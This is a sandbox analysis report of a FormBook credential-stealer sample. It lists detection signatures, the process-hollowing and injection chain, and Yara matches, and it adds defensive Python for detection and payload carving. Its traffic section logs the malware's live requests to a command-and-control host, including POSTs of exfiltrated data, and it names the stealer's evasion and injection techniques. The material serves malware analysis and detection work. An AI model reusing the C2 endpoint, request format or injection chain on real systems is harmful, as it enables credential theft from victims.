
Analysis Report 0001.exe

Overview

General Information

Sample Name: 0001.exe
Analysis ID: 255763
MD5: 7d9b6c57cbd92c8be2a5acd99d0c97ad
SHA1: 367bcae17a502ca3cef0bd293a3dd1cd55b7a934
SHA256: de5d696488d43ec35048aae1c3725da3325f36a4a4eb96e06b4c4932c6e224f7

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Detected FormBook malware
Malicious sample detected (through community Yara rule)
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
Allocates memory in foreign processes
Creates a thread in another existing process (thread injection)
Creates autostart registry keys with suspicious names
Injects a PE file into a foreign processes
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Tries to detect virtualization through RDTSC time measurements
Tries to harvest and steal browser information (history, passwords, etc)
Tries to steal Mail credentials (via file access)
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
PE / OLE file has an invalid certificate
PE file contains an invalid checksum
PE file contains strange resources
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Startup

  • System is w10x64
  • 0001.exe (PID: 6960 cmdline: 'C:\Users\user\Desktop\0001.exe' MD5: 7D9B6C57CBD92C8BE2A5ACD99D0C97AD)
    • ieinstal.exe (PID: 4592 cmdline: C:\Program Files (x86)\internet explorer\ieinstal.exe MD5: DAD17AB737E680C47C8A44CBB95EE67E)
      • explorer.exe (PID: 3508 cmdline: MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 5444 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
        • ieinstal.exe (PID: 5752 cmdline: 'C:\Program Files (x86)\internet explorer\ieinstal.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)
        • ieinstal.exe (PID: 4560 cmdline: 'C:\Program Files (x86)\internet explorer\ieinstal.exe' MD5: DAD17AB737E680C47C8A44CBB95EE67E)
  • cleanup
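The tree above is the FormBook injection chain as the sandbox renders it: 0001.exe starts the legitimate Internet Explorer add-on installer ieinstal.exe from Program Files and hollows it (the "Creates a process in suspended mode" and "Sample uses process hollowing technique" signatures), the hollowed ieinstal.exe injects explorer.exe, and explorer.exe then starts a 32-bit system utility, here C:\Windows\SysWOW64\control.exe, which carries the final stealer payload (the Yara hits on PID index 0000000E further down are control.exe's memory). No Sigma rule matched this run, so the following is an added example, not part of the Joe Sandbox report, of two process-creation checks that would have. The events are reconstructed from the Startup tree; the event field names, the path C:\Windows\explorer.exe (the report gives only its MD5) and the list of user-writable roots are my assumptions.

```python
"""Process-creation checks for the injection chain in the Startup tree.

Added example, not part of the Joe Sandbox report. Events are reconstructed
from the tree above; field names follow a generic process-creation log
(assumption), and explorer.exe's image path is assumed to be
C:\\Windows\\explorer.exe because the report lists only its MD5.
"""
from dataclasses import dataclass
from pathlib import PureWindowsPath


@dataclass(frozen=True)
class ProcEvent:
    pid: int
    image: str          # full path of the new process
    cmdline: str        # command line as logged (may be quoted)
    parent_pid: int
    parent_image: str   # full path of the creating process


# Constructed from the Startup section (PIDs, paths and command lines are the
# report's; explorer.exe's path is assumed).
EXPLORER = r"C:\Windows\explorer.exe"
IEINSTAL = r"C:\Program Files (x86)\internet explorer\ieinstal.exe"
EVENTS = [
    ProcEvent(4592, IEINSTAL, IEINSTAL, 6960, r"C:\Users\user\Desktop\0001.exe"),
    ProcEvent(5444, r"C:\Windows\SysWOW64\control.exe",
              r"C:\Windows\SysWOW64\control.exe", 3508, EXPLORER),
    ProcEvent(5752, IEINSTAL, "'" + IEINSTAL + "'", 3508, EXPLORER),
    ProcEvent(4560, IEINSTAL, "'" + IEINSTAL + "'", 3508, EXPLORER),
]

# Locations a standard user can write to (assumption; extend per environment).
USER_WRITABLE_ROOTS = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


def _name(path: str) -> str:
    return PureWindowsPath(path).name.lower()


def _is_user_writable(path: str) -> bool:
    return path.lower().startswith(USER_WRITABLE_ROOTS)


def _has_no_args(cmdline: str, image: str) -> bool:
    """True when the command line is just the (possibly quoted) image path."""
    return cmdline.strip().strip("'\"").lower() == image.lower()


def check_ieinstal_parent(ev: ProcEvent):
    """ieinstal.exe is normally launched by Internet Explorer itself, not by a
    binary living in a user-writable directory; that pairing is the hollowing target."""
    if _name(ev.image) == "ieinstal.exe" and _is_user_writable(ev.parent_image):
        return f"ieinstal.exe (pid {ev.pid}) started by user-writable parent {ev.parent_image}"
    return None


def check_explorer_spawn(ev: ProcEvent):
    """explorer.exe starting a SysWOW64 utility, or ieinstal.exe, with an empty
    argument list is the second hop of the chain (heuristic, see note below)."""
    if _name(ev.parent_image) != "explorer.exe" or not _has_no_args(ev.cmdline, ev.image):
        return None
    in_syswow64 = ev.image.lower().startswith("c:\\windows\\syswow64\\")
    if in_syswow64 or _name(ev.image) == "ieinstal.exe":
        return f"explorer.exe spawned {_name(ev.image)} (pid {ev.pid}) with no arguments"
    return None


def evaluate(events) -> list:
    """Run both checks over a process-creation stream; returns (pid, reason) pairs."""
    findings = []
    for ev in events:
        for check in (check_ieinstal_parent, check_explorer_spawn):
            reason = check(ev)
            if reason:
                findings.append((ev.pid, reason))
    return findings


if __name__ == "__main__":
    for pid, reason in evaluate(EVENTS):
        print(f"[{pid}] {reason}")
```

On real endpoint telemetry the second check needs tuning: users start Windows utilities from the shell all day, and it is the SysWOW64 restriction, the empty argument list and the pairing with the first finding inside a short window that make it usable. The tree also hides what an EDR would show directly, namely the suspended-process creation, the foreign memory writes and the thread/APC injection that the signature list names.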

Malware Configuration

No configs have been found

Yara Overview

Dropped Files

Source | Rule | Description | Author | Strings
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PSUEOSZZ\Cghtttt[1] | SUSP_Reversed_Base64_Encoded_EXE | Detects a base64 encoded executable with reversed characters | Florian Roth
  • 0x5d56f:$s4: AEAAAAIAAQpVT
  • 0x7ca9f:$s4: AEAAAAIAAQpVT
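The $s4 string matched in the cached download is the reversed base64 encoding of a DOS header: read backwards it is "TVpQAAIAAAAEA", which decodes to the bytes MZP 00 02 00 00 00 04, the "MZP" stub Borland/Delphi linkers emit. The whole payload was base64-encoded and then reversed character by character, so the executable's first bytes sit at the end of the encoded text. As an added example (not part of the report or of the rule's own code), the Python below carves such a run out of a blob and decodes it; the dropped file itself is not on this page, so the input is constructed here from an MZP header plus filler.

```python
"""Reversed-base64 executable carving, illustrating the SUSP_Reversed_Base64_Encoded_EXE hit.

Added example, not part of the report or of the rule's own code. The dropped
file is not available here, so the input is constructed: a Borland-style DOS
header ("MZP", the kind whose reversed base64 ends in the rule's $s4 string)
plus filler, base64-encoded and character-reversed.
"""
import base64

# $s4 from the Yara match above. Reversed it reads "TVpQAAIAAAAEA", the base64
# of b"MZP\x00\x02\x00\x00\x00\x04" followed by a zero high nibble.
MARKER_S4 = "AEAAAAIAAQpVT"

# First 12 bytes of a Borland/Delphi-style DOS header (constructed): e_magic "MZ",
# e_cblp 0x50 (the "P"), e_cp 2, e_crlc 0, e_cparhdr 4, e_minalloc 0x0f.
MZP_HEADER12 = b"MZP\x00\x02\x00\x00\x00\x04\x00\x0f\x00"

# Constructed stand-in for an executable; 37 bytes so that base64 needs padding.
PAYLOAD = MZP_HEADER12 + b"\xff\xff\x00\x00" + b"\x00" * 17 + b"PE\x00\x00"

B64_CHARS = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/="
)


def reversed_b64_marker(header: bytes) -> str:
    """What a reversed-base64 file looks like at its end: reverse(base64(header))."""
    return base64.b64encode(header).decode("ascii")[::-1]


def build_sample(payload: bytes, junk_before: bytes, junk_after: bytes) -> bytes:
    """Constructed dropped-file lookalike: junk + reverse(base64(payload)) + junk."""
    encoded = base64.b64encode(payload).decode("ascii")
    return junk_before + encoded[::-1].encode("ascii") + junk_after


def extract_reversed_b64_pe(blob: bytes, marker: str = MARKER_S4):
    """Carve and decode the reversed base64 run that ends with `marker`.

    Reversing puts the PE's first bytes at the *end* of the encoded run, so the
    marker tells us where the run finishes; the run start is found by walking
    backwards over base64 characters. Returns the decoded bytes, or None.
    """
    text = blob.decode("latin-1")          # 1:1 byte-to-char, keeps offsets
    end = text.find(marker)
    if end < 0:
        return None
    end += len(marker)
    start = end
    while start > 0 and text[start - 1] in B64_CHARS:
        start -= 1
    encoded = text[start:end][::-1]        # undo the reversal
    encoded += "=" * (-len(encoded) % 4)   # restore padding if it was stripped
    try:
        decoded = base64.b64decode(encoded, validate=True)
    except ValueError:
        return None
    return decoded if decoded.startswith(b"MZ") else None


# Constructed sample: non-base64 junk on both sides of the reversed run.
SAMPLE = build_sample(PAYLOAD, b"\x00\x13\xfe", b"\n\x00trailer")

if __name__ == "__main__":
    print(reversed_b64_marker(MZP_HEADER12))     # ends with AEAAAAIAAQpVT
    print(extract_reversed_b64_pe(SAMPLE) == PAYLOAD)
```

The rule has one string per common DOS-header variant for exactly this reason: a standard "MZ\x90\x00\x03..." header reverses to a different marker ("...AAAAEAAAAMAAQqVT"), so a scanner that only knows one variant misses the others. A carving tool should therefore derive its markers from the header variants it cares about, as reversed_b64_marker does, rather than hard-coding one string.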

Memory Dumps

Source | Rule | Description | Author | Strings
00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18449:$sqlite3step: 68 34 1C 7B E1
  • 0x1855c:$sqlite3step: 68 34 1C 7B E1
  • 0x18478:$sqlite3text: 68 38 2A 90 C5
  • 0x1859d:$sqlite3text: 68 38 2A 90 C5
  • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
21 further memory-dump entries not shown.

Unpacked PEs

Source | Rule | Description | Author | Strings
4.2.ieinstal.exe.10410000.3.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.ieinstal.exe.10410000.3.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x98b8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x9b32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x157c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x152b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x158c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x15a3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0xa6ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1452c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xb3b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x1ab37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1bb3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.ieinstal.exe.10410000.3.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
  • 0x18449:$sqlite3step: 68 34 1C 7B E1
  • 0x1855c:$sqlite3step: 68 34 1C 7B E1
  • 0x18478:$sqlite3text: 68 38 2A 90 C5
  • 0x1859d:$sqlite3text: 68 38 2A 90 C5
  • 0x1848b:$sqlite3blob: 68 53 D8 7F 8C
  • 0x185b3:$sqlite3blob: 68 53 D8 7F 8C
4.2.ieinstal.exe.10410000.3.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.ieinstal.exe.10410000.3.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
  • 0x8ab8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8d32:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x149c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x144b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14ac7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x14c3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x98ba:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x1372c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa5b3:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19d37:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1ad3a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
1 further entry not shown.
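Two things in the memory-dump and unpacked-PE match lists above are worth checking by hand. First, every JPCERT/CC $sqlite3* string is of the form 68 xx xx xx xx, i.e. an x86 push imm32; the rule's names tie each immediate to one sqlite3 API (sqlite3_step, sqlite3_column_text, sqlite3_column_blob), which is how the stealer reads browser SQLite databases, and treating those immediates as API-name hashes pushed before a resolver call is my inference, not something the report states. Second, the eleven Formbook_1 $sequence_* offsets in 4.2.ieinstal.exe.10410000.3.raw.unpack are each exactly 0xE00 higher than in 4.2.ieinstal.exe.10410000.3.unpack, which says the two entries are the same matches reported once in memory layout and once in file layout (0x1000 section alignment against 0x200 file alignment for the first section); that reading of the suffixes is an inference from the numbers. The Python below, an added example and not part of the report or the rule, scans a buffer for the three patterns, decodes the immediates, and verifies the constant delta; the buffer is constructed so the patterns sit at the offsets the report lists.

```python
"""Scanner for the $sqlite3* patterns of the JPCERT/CC "Formbook" rule listed above.

Added example, not part of the report or the rule. Every one of those strings is
`68 xx xx xx xx`, x86 PUSH imm32. The rule names tie each immediate to one
sqlite3 API; treating the immediates as API-name hashes pushed before a resolver
call is my inference. The buffer scanned here is constructed so that the
patterns sit at the offsets the report lists.
"""
import re
import struct

# Byte patterns exactly as printed in the Yara match output.
SQLITE3_PATTERNS = {
    "sqlite3step": bytes.fromhex("68 34 1C 7B E1"),
    "sqlite3text": bytes.fromhex("68 38 2A 90 C5"),
    "sqlite3blob": bytes.fromhex("68 53 D8 7F 8C"),
}

# Match offsets from the 00000004...10410000 memory dump above (the same six
# are listed for 4.2.ieinstal.exe.10410000.3.raw.unpack).
PAGE_OFFSETS = {
    0x18449: "sqlite3step", 0x1855c: "sqlite3step",
    0x18478: "sqlite3text", 0x1859d: "sqlite3text",
    0x1848b: "sqlite3blob", 0x185b3: "sqlite3blob",
}

# The eleven Formbook_1 $sequence_* offsets, raw.unpack vs unpack, in page order.
RAW_UNPACK_OFFSETS = [0x98b8, 0x9b32, 0x157c5, 0x152b1, 0x158c7, 0x15a3f,
                      0xa6ba, 0x1452c, 0xb3b3, 0x1ab37, 0x1bb3a]
UNPACK_OFFSETS = [0x8ab8, 0x8d32, 0x149c5, 0x144b1, 0x14ac7, 0x14c3f,
                  0x98ba, 0x1372c, 0xa5b3, 0x19d37, 0x1ad3a]


def decode_push_imm32(code: bytes) -> int:
    """Return the immediate of a 5-byte `push imm32` (opcode 0x68, little-endian)."""
    if len(code) != 5 or code[0] != 0x68:
        raise ValueError("not a push imm32")
    return struct.unpack("<I", code[1:])[0]


def build_buffer(placements: dict, size: int = 0x18600, fill: int = 0x90) -> bytes:
    """Constructed dump: NOP filler with the patterns written at chosen offsets."""
    buf = bytearray([fill]) * size
    for offset, name in placements.items():
        buf[offset:offset + 5] = SQLITE3_PATTERNS[name]
    return bytes(buf)


def scan(buf: bytes) -> list:
    """All (offset, name, immediate) hits, ordered by offset."""
    hits = []
    for name, pattern in SQLITE3_PATTERNS.items():
        for m in re.finditer(re.escape(pattern), buf):
            hits.append((m.start(), name, decode_push_imm32(pattern)))
    return sorted(hits)


def matches_rule(buf: bytes) -> bool:
    """Assumed condition: all three sqlite3 patterns present (every dump in the
    report that matched the rule lists all three)."""
    found = {name for _, name, _ in scan(buf)}
    return found == set(SQLITE3_PATTERNS)


def layout_delta(raw_offsets, unpack_offsets):
    """Constant difference between the two offset lists, or None if it varies
    (a single value means both lists are the same matches in two layouts)."""
    if len(raw_offsets) != len(unpack_offsets):
        return None
    deltas = {r - u for r, u in zip(raw_offsets, unpack_offsets)}
    return deltas.pop() if len(deltas) == 1 else None


BUF = build_buffer(PAGE_OFFSETS)

if __name__ == "__main__":
    for offset, name, imm in scan(BUF):
        print(f"0x{offset:x} {name}: push 0x{imm:08X}")
    print(f"raw.unpack - unpack delta: 0x{layout_delta(RAW_UNPACK_OFFSETS, UNPACK_OFFSETS):X}")
```

The practical use of the immediates is pivoting: once the three values are known, the same push constants can be searched for in other dumps, and a hit in a process that has no business touching SQLite (here ieinstal.exe and control.exe) is a stronger indicator than the generic $sequence_* code fragments.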

Sigma Overview

No Sigma rule has matched

Signature Overview


AV Detection:

Yara detected FormBook
Source: Yara match | File source: 00000004.00000002.321776702.0000000010410000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.317379790.00000000030A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.498679834.0000000000DE0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.497113298.00000000007A0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.317715716.0000000004A90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000002.498454375.0000000000D90000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match | File source: 4.2.ieinstal.exe.10410000.3.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.ieinstal.exe.10410000.3.unpack, type: UNPACKEDPE
Machine Learning detection for sample
Source: 0001.exe | Joe Sandbox ML: detected
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4x nop then pop ebx | 4_2_10417AD0
Source: C:\Program Files (x86)\Internet Explorer\ieinstal.exe | Code function: 4x nop then pop edi | 4_2_1041E58F
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop ebx | 14_2_007A7AD0
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi | 14_2_007B6D61
Source: C:\Windows\SysWOW64\control.exe | Code function: 4x nop then pop edi | 14_2_007AE58F
Source: global traffic | HTTP traffic detected:
  GET /3nop/?sPXLMT=t90IjdgfDENVc0T1Dnlw8jEGtrxzOKCpJZWtpo0gR2G0NWwGMYr6NEOXU6tP9KcCJTWz&Mvdl=2d28 HTTP/1.1
  Host: www.paintpartyblueprint.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: global traffic | HTTP traffic detected:
  POST /3nop/ HTTP/1.1
  Host: www.paintpartyblueprint.com
  Connection: close
  Content-Length: 412
  Cache-Control: no-cache
  Origin: http://www.paintpartyblueprint.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.paintpartyblueprint.com/3nop/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 73 50 58 4c 4d 54 3d 6c 66 34 79 39 38 6f 57 64 6b 78 71 4d 44 43 76 65 77 77 59 68 56 6f 38 6d 35 39 45 5a 2d 65 6a 63 70 65 6b 31 4f 42 33 65 55 4b 51 63 6c 49 4f 47 4a 36 4f 4e 52 33 52 58 49 56 65 31 59 31 6f 50 77 33 71 6b 35 33 73 50 61 43 37 67 61 6a 4b 44 4c 4c 76 76 31 4c 2d 76 39 4e 47 76 79 79 66 72 71 59 65 73 64 32 66 75 6e 6c 46 6c 51 43 73 5a 35 54 6e 77 48 33 6d 38 45 38 44 64 73 64 37 34 61 39 79 66 4f 72 34 6a 58 38 2d 35 52 50 6c 72 51 4b 77 74 53 6f 52 73 4d 49 30 31 57 78 68 45 52 61 6e 79 54 61 62 72 4e 45 4d 49 4f 78 32 56 34 6b 77 69 30 4f 62 42 65 52 64 58 54 4b 6c 52 6e 4a 48 38 64 36 35 4f 4a 53 4d 57 30 31 59 77 46 55 31 35 69 77 70 49 66 28 78 57 52 55 47 6b 48 57 7a 48 73 75 50 73 39 51 33 46 44 63 68 4c 42 6e 6b 78 4c 78 31 55 2d 72 55 48 73 41 78 59 2d 61 61 56 42 45 4c 50 52 55 47 6a 46 50 78 33 69 70 74 4b 42 67 42 56 62 48 4f 55 4d 31 34 30 4c 54 74 6f 6c 57 68 4a 75 54 61 54 6e 7e 7a 36 4a 5a 55 6a 72 46 32 56 6b 59 62 32 56 39 49 44 4e 58 5f 55 48 36 5a 73 42 79 67 61 6c 6b 33 62 46 41 4a 4c 50 77 53 50 57 64 39 63 4a 58 56 70 37 70 6e 79 45 74 6a 6e 56 4e 73 45 57 78 45 46 45 7a 56 51 38 4e 36 6e 55 6d 71 35 6c 52 75 34 6c 46 38 38 6f 79 5f 6b 67 36 65 4c 5f 71 4f 38 41 29 2e 00 00 00 00 00 00 00 00
  Data Ascii: sPXLMT=lf4y98oWdkxqMDCvewwYhVo8m59EZ-ejcpek1OB3eUKQclIOGJ6ONR3RXIVe1Y1oPw3qk53sPaC7gajKDLLvv1L-v9NGvyyfrqYesd2funlFlQCsZ5TnwH3m8E8Ddsd74a9yfOr4jX8-5RPlrQKwtSoRsMI01WxhERanyTabrNEMIOx2V4kwi0ObBeRdXTKlRnJH8d65OJSMW01YwFU15iwpIf(xWRUGkHWzHsuPs9Q3FDchLBnkxLx1U-rUHsAxY-aaVBELPRUGjFPx3iptKBgBVbHOUM140LTtolWhJuTaTn~z6JZUjrF2VkYb2V9IDNX_UH6ZsBygalk3bFAJLPwSPWd9cJXVp7pnyEtjnVNsEWxEFEzVQ8N6nUmq5lRu4lF88oy_kg6eL_qO8A).
Source: global traffic | HTTP traffic detected:
  POST /3nop/ HTTP/1.1
  Host: www.paintpartyblueprint.com
  Connection: close
  Content-Length: 166288
  Cache-Control: no-cache
  Origin: http://www.paintpartyblueprint.com
  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
  Content-Type: application/x-www-form-urlencoded
  Accept: */*
  Referer: http://www.paintpartyblueprint.com/3nop/
  Accept-Language: en-US
  Accept-Encoding: gzip, deflate
  Data Raw: 73 50 58 4c 4d 54 3d 6c 66 34 79 39 35 5a 6c 66 31 46 37 64 46 53 71 65 67 67 51 6c 57 68 68 69 2d 4e 54 4a 5a 79 64 56 65 76 70 31 4c 4a 37 57 31 61 4f 4e 56 59 4f 41 4b 53 4e 4c 78 33 53 41 59 56 64 78 59 6f 66 47 43 6e 59 6b 34 69 6b 50 61 4b 38 70 34 37 4c 4e 37 4b 6e 75 56 58 6f 36 75 78 64 76 78 47 71 72 50 67 57 70 64 4b 66 7a 6e 74 4c 68 31 76 2d 65 38 37 34 35 54 54 6e 76 31 56 58 64 65 5a 31 71 38 74 55 63 4b 6a 74 6e 6b 67 33 39 69 6e 42 38 7a 36 5f 68 69 55 57 67 72 59 6e 78 48 39 6c 44 51 61 76 7e 33 32 55 31 74 63 47 64 39 5a 51 57 37 6f 6e 67 45 28 39 42 64 77 6f 55 56 71 30 54 55 4e 50 7e 4d 32 54 47 63 32 4f 5a 6a 70 41 30 44 68 50 7e 54 41 47 42 2d 50 71 53 42 70 45 6c 46 65 46 61 5a 44 78 75 4d 63 37 4e 54 4d 5a 49 58 72 38 75 61 68 61 63 64 4c 48 63 76 49 50 64 38 57 34 62 42 45 67 4a 52 56 4a 72 56 75 52 39 32 5a 69 4f 51 77 72 55 64 48 61 54 59 46 31 31 4a 37 4c 6c 6b 28 35 47 38 7a 4f 59 7a 61 48 7e 70 4d 5a 6a 38 6c 56 66 45 5a 43 6a 44 42 42 44 4e 58 5a 55 47 37 2d 74 31 53 67 5a 52 6f 43 66 69 73 56 4e 50 77 50 4a 47 74 37 48 4f 58 46 70 37 78 6e 67 45 39 4e 6c 6d 64 73 44 46 5a 44 45 68 48 56 57 4d 4e 36 76 30 6e 4b 77 30 4e 68 79 58 52 6a 78 2d 4f 6e 6e 46 79 4f 48 39 76 51 72 54 62 6c 28 6f 6f 39 59 6d 57 52 54 69 55 55 70 62 74 55 74 35 32 64 64 6f 5a 38 50 39 59 51 65 38 61 41 48 73 4f 55 53 63 69 39 42 6a 55 4b 7a 4c 4a 6a 75 5a 51 53 61 4e 65 4c 7e 4f 56 5a 6f 59 73 4f 39 52 7a 62 4a 31 73 36 44 58 58 44 74 55 65 34 74 58 61 74 79 75 42 5a 70 54 4c 32 76 4a 64 5a 7a 39 66 43 6b 51 36 31 38 45 75 4a 63 6c 74 4b 65 6a 4c 6c 75 66 45 51 79 33 70 4f 4c 45 33 44 37 4e 46 6c 4a 47 37 69 39 44 52 65 79 6c 28 63 54 48 4c 6d 45 63 4b 49 39 7a 4e 65 4f 63 72 50 50 4f 4e 4c 50 58 54 7a 73 6f 32 50 4c 6a 63 57 69 79 48 4c 53 52 78 67 46 5a 49 56 4f 33 78 2d 76 47 57 6e 41 67 65 57 67 55 34 6c 67 6a 6e 4b 54 77 73 64 37 62 6d 42 39 58 7e 4b 56 4a 68 51 73 32 73 39 37 45 45 59 28 76 63 53 5a 47 77 64 58 5a 63 55 63 46 52 69 28 4c 47 6a 6f 4b 71 62 51 4f 4e 73 39 53 63 59 32 30 38 64 38 65 67 62 54 54 79 57 79 48 70 79 75 65 55 61 6d 43 65 37 68 58 28 7a 6f 52 52 71 43 49 39 58 4f 75 46 49 56 53 7e 42 59 6d 49 59 71 56 46 42 65 79 43 56 63 4f 54 2d 39 4c 6f 79 36 45 69 59 6b 6b 49 77 56 55 36 63 55 39 64 41 63 71 6b 52 68 34 79 4c 35 4b 49 50 6e 44 54 71 69 6d 4f 61 6d 4f 42 66 50 49 45 65 38 33 43 43 4b 64 66 47 4c 72 4a 30 28 46 57 2d 56 4c 6a 75 42 7a 6a 4a 63 4c 41 55 4e 4c 46 2d 55 6a 4f 50 75 5a 63 73 68 35 28 56 6d 6e 70 41 49 6b 5a 63 53 6f 47 57 54 4f 4d 53 6c 78 74 39 67 52 4d 35 7e 52 4c 51
Source: global traffic | HTTP traffic detected:
  GET /3nop/?sPXLMT=t90IjdgfDENVc0T1Dnlw8jEGtrxzOKCpJZWtpo0gR2G0NWwGMYr6NEOXU6tP9KcCJTWz&Mvdl=2d28 HTTP/1.1
  Host: www.paintpartyblueprint.com
  Connection: close
  Data Raw: 00 00 00 00 00 00 00
  Data Ascii:
Source: explorer.exe, 00000005.00000000.289730703.000000000AAC3000.00000002.00000001.sdmp | String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
